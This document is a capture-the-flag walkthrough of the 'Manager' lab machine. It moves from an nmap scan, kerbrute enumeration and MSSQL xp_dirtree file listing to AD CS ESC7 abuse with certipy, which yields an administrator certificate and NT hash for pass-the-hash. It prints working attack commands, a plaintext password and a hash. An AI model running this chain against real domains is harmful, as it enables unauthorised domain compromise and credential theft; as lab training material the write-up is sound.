nmap -sC -sV -p- -v -Pn -T4 10.10.11.236
Host is up (0.22s latency).
Not shown: 65512 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Manager
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-06 16:22:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-01-06T05:46:17
| Not valid after: 2055-01-06T05:46:17
| MD5: 346f d375 c363 4b3c d3b1 400e 6689 28df
|_SHA-1: bd8f a0a9 3270 3fa0 7874 6ecd c492 bc02 bc4f 9fa4
| ms-sql-ntlm-info:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
| Product_Version: 10.0.17763
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m00s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:56+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Issuer: commonName=manager-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-30T17:08:51
| Not valid after: 2122-07-27T10:31:04
| MD5: bc56 af22 5a3d db67 c9bb a439 4232 14d1
|_SHA-1: 2b6d 98b3 d379 df64 59f6 c665 d4b7 53b0 faf6 e07a
|_ssl-date: 2025-01-06T16:23:57+00:00; +7h00m00s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49691/tcp open msrpc Microsoft Windows RPC
49721/tcp open msrpc Microsoft Windows RPC
49793/tcp open msrpc Microsoft Windows RPC
64371/tcp open tcpwrapped
64411/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
| Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
| TCP port: 1433
| smb2-time:
| date: 2025-01-06T16:23:17
| start_date: N/A
NSE: Script Post-scanning.
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Initiating NSE at 17:24
Completed NSE at 17:24, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 432.03 seconds
Raw packets sent: 196768 (8.658MB) | Rcvd: 232 (10.208KB)
./kerbrute userenum -d manager.htb --dc 10.10.11.236 ./dict/seclists/Usernames/cirt-default-usernames.txt
Kerberos pre-auth user enumeration (no password needed, and it does not lock accounts) returns a valid user:
operator@manager.htb
Log in to MSSQL (1433/tcp) with the operator account.
The login is low-privileged, but the xp_dirtree extended stored procedure is callable (it is granted to public by default), which lets the account list directories on the DC's filesystem.
Listing the web server's directories reveals the site's files.
Download them.
Among them is a configuration file.
Inspect its contents: it holds credentials.
Try a WinRM (5985/tcp) login with those credentials; it succeeds and gives user.txt.
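The xp_dirtree queries behind the "list, download, inspect" steps above, as an added example that is not part of the original writeup. The web root C:\inetpub\wwwroot (the IIS default) and the file-name patterns are assumptions; the page only records that web files were found.

```sql
-- Added example, not from the original writeup.
-- Assumptions: the web root is the IIS default C:\inetpub\wwwroot and the
-- files worth pulling are archives/backups/config files by extension.

-- Confirm the privilege level first: xp_dirtree needs no sysadmin role,
-- unlike xp_cmdshell, so a non-sysadmin result here is expected.
SELECT SYSTEM_USER AS login_name,
       IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- Shallow listing of the web root: depth 1, file = 1 (include files, not only directories).
EXEC master.dbo.xp_dirtree 'C:\inetpub\wwwroot', 1, 1;

-- xp_dirtree returns only names and their depth, never full paths, so capture a
-- deeper listing in a temp table and filter it instead of reading it by eye.
-- "file" is a reserved word in T-SQL, hence the brackets.
CREATE TABLE #tree (subdirectory NVARCHAR(260), depth INT, [file] BIT);
INSERT INTO #tree
    EXEC master.dbo.xp_dirtree 'C:\inetpub\wwwroot', 3, 1;   -- recurse three levels

SELECT subdirectory, depth
  FROM #tree
 WHERE [file] = 1
   AND (subdirectory LIKE '%.zip'    OR subdirectory LIKE '%.bak'
     OR subdirectory LIKE '%.xml'    OR subdirectory LIKE '%.config'
     OR subdirectory LIKE '%.old%');

DROP TABLE #tree;
```

xp_dirtree can only list, not read, so the download step is a plain HTTP GET against the IIS site on port 80 for each file name the query returns; IIS does not enumerate directory contents by default, but it will serve a file whose name you already know.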
Get-WindowsFeature -Name AD-Certificate
AD CS is installed (the nmap output already hinted at it: the LDAP certificates are issued by manager-DC01-CA).
Enumerate vulnerable certificate templates and CA permissions with certipy, authenticating as raven:
certipy-ad find -u raven@manager.htb -p 'R4v3nBe5tD3veloP3r!123' -vulnerable -stdout -dc-ip 10.10.11.236 -debug
ESC7 exploitation. certipy flags the CA as ESC7 because raven holds the ManageCA right on manager-DC01-CA. That right alone cannot issue certificates, but it lets raven grant itself the ManageCertificates (certificate officer) role, which can approve pending requests.
Add raven as an officer on the CA:
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -add-officer raven
Enable the built-in SubCA template on the CA. SubCA lets the enrollee supply the subject (the ESC1 condition), but only Domain Admins and Enterprise Admins may enroll in it, so an ordinary request is denied; a denied request is still stored on the CA, and an officer can issue it afterwards:
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -enable-template SubCA
Request a SubCA certificate with administrator@manager.htb as the UPN. The request is denied but saved; certipy prints its request ID (24 in this run, it differs per run). Issue that request with the officer right just granted, then retrieve the resulting certificate as administrator.pfx:
certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb
certipy-ad ca -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -issue-request 24
certipy-ad req -ca manager-DC01-CA -dc-ip 10.10.11.236 -u raven -p 'R4v3nBe5tD3veloP3r!123' -template SubCA -target dc01.manager.htb -upn administrator@manager.htb -retrieve 24
certipy-ad auth -pfx administrator.pfx
Authenticating with the certificate fails with a Kerberos clock-skew error (KRB_AP_ERR_SKEW): the scan already showed the DC about 7 hours ahead of the attacking host, and Kerberos tolerates at most 5 minutes by default. Sync the local clock with the DC (needs root; an alternative that does not touch the system clock is running the command under faketime with the DC's time):
ntpdate 10.10.11.236
Authenticate again with the certificate. certipy requests a TGT with PKINIT and then uses it to recover the account's NT hash:
certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.11.236
The hash is printed in LM:NT form. The first half, aad3b435b51404eeaad3b435b51404ee, is the placeholder for an empty LM hash; the second half is administrator's NT hash, which can be used directly for pass-the-hash (for example evil-winrm -H or impacket's -hashes :NTHASH) to obtain root.txt.
aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef